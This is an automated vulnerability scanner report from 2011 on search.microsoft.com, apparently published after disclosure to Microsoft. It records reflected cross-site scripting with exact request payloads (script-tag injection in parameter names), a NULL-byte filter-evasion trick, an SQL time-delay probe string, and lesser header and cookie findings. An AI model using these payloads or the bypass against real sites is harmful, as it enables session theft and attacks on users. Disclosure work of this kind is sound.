XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Arbitrary Insertion, search.microsoft.com

Report generated by XSS.CX at Sun Oct 09 07:44:42 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Reported to MSRC on July 6, 2011 and reported resolved 11-11-2011 | 11535nj


Loading

1. Cross-site scripting (reflected)

XSS in search.microsoft.com, IE XSS Filter Evasion, MSHTML, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://search.microsoft.com/Help.aspx [name of an arbitrarily supplied request parameter]

1.2. http://search.microsoft.com/Preference.aspx [name of an arbitrarily supplied request parameter]

1.3. http://search.microsoft.com/Results.aspx [name of an arbitrarily supplied request parameter]

1.4. http://search.microsoft.com/search.aspx [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

2.1. http://search.microsoft.com/

2.2. http://search.microsoft.com/AdvancedSearch.aspx

2.3. http://search.microsoft.com/Help.aspx

2.4. http://search.microsoft.com/Preference.aspx

2.5. http://search.microsoft.com/Results.aspx

2.6. http://search.microsoft.com/Results.aspx

2.7. http://search.microsoft.com/Results_error.aspx

2.8. http://search.microsoft.com/Search.aspx

2.9. http://search.microsoft.com/WorldWide.aspx

2.10. http://search.microsoft.com/results.aspx

2.11. http://search.microsoft.com/search.aspx

3. Cookie without HttpOnly flag set

3.1. http://search.microsoft.com/

3.2. http://search.microsoft.com/AdvancedSearch.aspx

3.3. http://search.microsoft.com/Help.aspx

3.4. http://search.microsoft.com/Preference.aspx

3.5. http://search.microsoft.com/Results_error.aspx

3.6. http://search.microsoft.com/WorldWide.aspx

3.7. http://search.microsoft.com/results.aspx

3.8. http://search.microsoft.com/search.aspx

4. Content type incorrectly stated

4.1. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_cs-CZ.gif

4.2. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_da-DK.gif

4.3. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-AU.gif

4.4. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-CA.gif

4.5. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-US.gif



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://search.microsoft.com/Help.aspx [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Help.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cee"><script>alert(1)</script>827bde607d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Help.aspx?36cee"><script>alert(1)</script>827bde607d6=1 HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 44506

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<a href="/Help.aspx?36cee"><script>alert(1)</script>827bde607d6=1&mkt=en-US&bladeFlyout=Buy" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_ItemLink" class="hpBld_ItemLinkNormal msPopup_Link">
...[SNIP]...

1.2. http://search.microsoft.com/Preference.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /Preference.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019404"><a>bfce8838521 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19404"><a>bfce8838521 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Preference.aspx?%0019404"><a>bfce8838521=1 HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 51539

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<a href="/Preference.aspx?.19404"><a>bfce8838521=1&mkt=en-US&bladeFlyout=Buy" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_ItemLink" class="hpBld_ItemLinkNormal msPopup_Link">
...[SNIP]...

1.3. http://search.microsoft.com/Results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b76a3"><script>alert(1)</script>8da10c03979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Results.aspx?mkt=en-US&qsc0=0&q=xss+sqli+http+xmli++++meta%3asearch.msforums.forumid(690a399e-fac3-4345-8063-d9ac7ffced47&b76a3"><script>alert(1)</script>8da10c03979=1 HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 52257
Date: Sun, 09 Oct 2011 01:35:56 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<a href="/Results.aspx?mkt=en-US&qsc0=0&q=xss+sqli+http+xmli++++meta%3asearch.msforums.forumid(690a399e-fac3-4345-8063-d9ac7ffced47&b76a3"><script>alert(1)</script>8da10c03979=1&bladeFlyout=Buy" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_ItemLink" class="hpBld_ItemLinkNormal msPopup_Link">
...[SNIP]...

1.4. http://search.microsoft.com/search.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /search.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d179f"a%3d"b"c5ca6a3cc19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d179f"a="b"c5ca6a3cc19 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search.aspx?mkt=es-ar&d179f"a%3d"b"c5ca6a3cc19=1 HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=es-ar; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 36976

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<a href="/search.aspx?mkt=es-ar&d179f"a="b"c5ca6a3cc19=1&bladeFlyout=Buy" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_ItemLink" class="hpBld_ItemLinkNormal msPopup_Link">
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://search.microsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EB)%3C/script%3E=%27;WAITFOR%20DELAY%20%270:0:25%27--&mkt=en-US HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 02:34:57&Microsoft.VisitStartDate=10/09/2011 02:34:57&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=15&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D; mkt1=norm=en-US; mkt2=ui=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 40098
Date: Sun, 09 Oct 2011 12:27:36 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=&amp;qsc0=0&amp;FORM=BMMH">Search the web with Bing</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.2. http://search.microsoft.com/AdvancedSearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /AdvancedSearch.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdvancedSearch.aspx?mkt=en-US&qsc0=0&q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&FORM=BAME HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 44890

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMMA">Search the web with Bing</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.3. http://search.microsoft.com/Help.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Help.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Help.aspx?mkt=en-US&qsc0=0&q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&FORM=HLME HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 45164

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.4. http://search.microsoft.com/Preference.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Preference.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Preference.aspx?mkt=en-US&qsc0=0&q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&FORM=SEME HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 52621

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.5. http://search.microsoft.com/Results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Results.aspx?mkt=en-US&qsc0=0&q=xss+sqli+http+xmli++++meta%3asearch.msforums.forumid(690a399e-fac3-4345-8063-d9ac7ffced47 HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 52165

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3Asearch%2Emsforums%2Eforumid%28690a399e%2Dfac3%2D4345%2D8063%2Dd9ac7ffced47&amp;FORM=BMMO">Search the web with Bing.</a>
...[SNIP]...
